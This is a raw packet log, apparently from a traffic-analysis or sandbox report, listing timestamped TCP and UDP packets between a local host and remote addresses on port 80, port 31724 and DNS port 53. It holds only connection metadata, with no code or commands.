Aug 24, 2021 19:39:24.880992889 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.880996943 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.881007910 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.881021023 CEST	80	49707	172.67.216.236	192.168.2.3
Aug 24, 2021 19:39:24.881021976 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.881056070 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:24.927419901 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:39:26.704371929 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:39:26.724976063 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:39:26.725735903 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:39:26.735119104 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:39:26.755880117 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:39:26.802556992 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:39:26.959928989 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:39:26.980874062 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:39:27.036928892 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:39:27.180514097 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:39:27.201461077 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:39:27.201690912 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:39:27.201782942 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:39:27.695899010 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:39:27.769042969 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:39:32.729062080 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:39:32.799747944 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:39:32.901021957 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:39:32.901053905 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:39:32.901068926 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:39:32.901166916 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:39:32.943625927 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:39:33.154469967 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:39:33.237174034 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:39:40.114444971 CEST	31724	49861	159.69.210.57	192.168.2.3
Aug 24, 2021 19:39:40.114514112 CEST	31724	49861	159.69.210.57	192.168.2.3
Aug 24, 2021 19:39:40.114592075 CEST	49861	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:39:40.114628077 CEST	49861	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:04.390989065 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:04.418080091 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:04.462306023 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:04.580646038 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:04.602006912 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:04.649879932 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:04.888068914 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:04.910408020 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:04.937060118 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:04.958496094 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:04.996475935 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:05.017816067 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:05.071990967 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:05.075292110 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:05.112911940 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:05.117641926 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:05.171088934 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:05.212460041 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:05.235925913 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:05.275547981 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:05.321777105 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:05.323863983 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:05.345963001 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:05.502249002 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:05.524523020 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:05.596699953 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:05.605436087 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:05.650629997 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:05.669312000 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:05.737468004 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:05.965873957 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:06.009783983 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:06.386919975 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:06.410892963 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:06.416574955 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:06.437966108 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:06.478812933 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:06.786808014 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:06.809253931 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:06.853180885 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.043894053 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.069317102 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.069382906 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.069413900 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.069442987 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.069461107 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.069472075 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.069533110 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.069570065 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.069613934 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.090238094 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.090272903 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.090396881 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.090408087 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.090428114 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.090444088 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.090502024 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.090576887 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.091825962 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.091850042 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.091861010 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.091876030 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.091886044 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.091888905 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.091896057 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.091908932 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.091923952 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.092185020 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.092685938 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.094477892 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.111571074 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.111609936 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.111619949 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.111716986 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.111742973 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.111856937 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.111936092 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.112298965 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.112404108 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.112518072 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.112636089 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.112865925 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.113172054 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.113253117 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.114727020 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.114749908 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.114989042 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.115005970 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.115015984 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.115031004 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.115250111 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.115407944 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.115550041 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.116246939 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.116266966 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.133749008 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.133785963 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.133796930 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.133806944 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.133825064 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.133836985 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.133846045 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.134233952 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.134264946 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.134274960 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.134285927 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.134304047 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.134320974 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.134335995 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.134350061 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.134432077 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.134433031 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.134448051 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.134474039 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.134521008 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.134675026 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.135040998 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.135056973 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.135452032 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.135525942 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.137589931 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.157615900 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.157645941 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.157659054 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.157665968 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.157674074 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.157685995 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.157694101 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.157705069 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.157713890 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.157778978 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.157790899 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.157802105 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.157812119 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.157821894 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.157835960 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.158128023 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.158144951 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.158375978 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.158467054 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.159185886 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.159426928 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.159838915 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.160191059 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.160439968 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.160468102 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.160480022 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.160569906 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.160626888 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.161024094 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.161099911 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.162389994 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.180743933 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.180774927 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.180784941 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.180794954 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.180803061 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.180814028 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.180825949 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.181355000 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.181379080 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.181921959 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.181940079 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.182025909 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.182082891 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.182185888 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.182209015 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.182293892 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.182328939 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.182377100 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.182490110 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.182584047 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.183466911 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.183482885 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.183908939 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.183989048 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.206342936 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.206370115 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.206381083 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.206398964 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.206413031 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.206429005 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.206443071 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.206463099 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.206480980 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.206496954 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.206512928 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.206521988 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.206532955 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.207519054 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.207539082 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.207550049 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.207566023 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.207617998 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.207884073 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.207901955 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.207912922 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.207928896 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.207940102 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.208079100 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.208163023 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.209305048 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.209747076 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.209827900 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.229284048 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.229315042 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.229329109 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.229342937 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.229357004 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.229384899 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.229396105 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.229934931 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.229948997 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.229957104 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.229969025 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.229979038 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.229986906 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.230334997 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.230346918 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.230456114 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.230617046 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.230737925 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.231260061 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.231272936 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.231640100 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.231667995 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.231703997 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.232059002 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.233037949 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.233056068 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.233067989 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.233081102 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.233182907 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.233216047 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.253412008 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.254673004 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.255314112 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.255844116 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.255857944 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.255870104 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.255882025 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.255896091 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.257488966 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.257867098 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.261600971 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.266479969 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.289772987 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.336272955 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.409073114 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.410672903 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.462722063 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.472425938 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.494622946 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.494662046 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.494672060 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.543258905 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.547858000 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.634155035 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.642608881 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.697062016 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.716836929 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.744318962 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.744756937 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.744833946 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.744925022 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.745204926 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.765450001 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.961709023 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.965969086 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.969201088 CEST	31724	49708	159.69.210.57	192.168.2.3
Aug 24, 2021 19:40:07.987405062 CEST	49708	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:40:07.987684011 CEST	49707	80	192.168.2.3	172.67.216.236
Aug 24, 2021 19:41:06.304495096 CEST	31724	50027	159.69.210.57	192.168.2.3
Aug 24, 2021 19:41:06.304740906 CEST	50027	31724	192.168.2.3	159.69.210.57
Aug 24, 2021 19:41:06.307673931 CEST	31724	50027	159.69.210.57	192.168.2.3
Aug 24, 2021 19:41:06.307938099 CEST	50027	31724	192.168.2.3	159.69.210.57

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 24, 2021 19:39:15.948971987 CEST	50620	53	192.168.2.3	8.8.8.8
Aug 24, 2021 19:39:15.998183012 CEST	53	50620	8.8.8.8	192.168.2.3
Aug 24, 2021 19:39:24.645962954 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 24, 2021 19:39:24.742316008 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 24, 2021 19:39:33.427870035 CEST	60152	53	192.168.2.3	8.8.8.8
Aug 24, 2021 19:39:33.465048075 CEST	53	60152	8.8.8.8	192.168.2.3
Aug 24, 2021 19:39:33.474956989 CEST	57544	53	192.168.2.3	8.8.8.8
Aug 24, 2021 19:39:33.513570070 CEST	53	57544	8.8.8.8	192.168.2.3
Aug 24, 2021 19:39:37.093772888 CEST	55984	53	192.168.2.3	8.8.8.8
Aug 24, 2021 19:39:37.119261026 CEST	53	55984	8.8.8.8	192.168.2.3
Aug 24, 2021 19:39:48.298460960 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 24, 2021 19:39:48.333522081 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 24, 2021 19:40:08.809391022 CEST	65110	53	192.168.2.3	8.8.8.8
Aug 24, 2021 19:40:08.841561079 CEST	53	65110	8.8.8.8	192.168.2.3
